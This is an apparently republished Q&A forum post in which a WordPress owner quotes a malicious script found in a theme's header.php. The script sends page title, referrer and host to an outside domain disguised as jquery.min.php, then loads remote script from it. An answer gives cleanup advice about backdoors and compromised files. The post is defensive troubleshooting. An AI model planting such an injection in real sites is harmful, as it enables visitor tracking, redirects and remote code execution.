Unknown code found in wordpress site's header.php file
Question
I found below code into theme's header.php file and i am not sure what are they all about.
<script>
var a = '';
setTimeout(10);
var default_keyword = encodeURIComponent(document.title);
var se_referrer = encodeURIComponent(document.referrer);
var host = encodeURIComponent(window.location.host);
var base = "http://tradenetservice.com/js/jquery.min.php";
var n_url = base + "?default_keyword=" + default_keyword + "&se_referrer=" + se_referrer + "&source=" + host;
var f_url = base + "?c_utt=snt2014&c_utm=" + encodeURIComponent(n_url);
if (default_keyword !== null && default_keyword !== '' && se_referrer !== null && se_referrer !== '') {
document.write('<script type="text/javascript" src="' + f_url + '">' + '<' + '/script>');
}
</script>
1 answers
solution1
1 2016-01-09 11:58:29
I had a hacked wordpress site just a week ago with a similar injection. The was added code in my header.php that redirected users to external sites (ads, porn) only if the site was browsed from a mobile.
Other files in the active theme were also injected.
What I did was download all the site files, and compare them against a backup. This way I found the injected code in the theme, and also some files inside /wp-includes/ that were not part of a regular wordpress installation, a backdoor of sorts.
Also check wp-load.php on the site root, in my case the file I deleted from /wp-includes/ was being included/executed form an extra line in this file.
aside from cleaning your site's code, you should do some search about securing your wordpress site against hacking, and will find many recommended measures to try and prevent it from happening again.
The technical post webpages of this site follow the CC BY-SA 4.0 protocol. If you need to reprint, please indicate the site URL or the original address.Any question please contact:yoyou2525@163.com.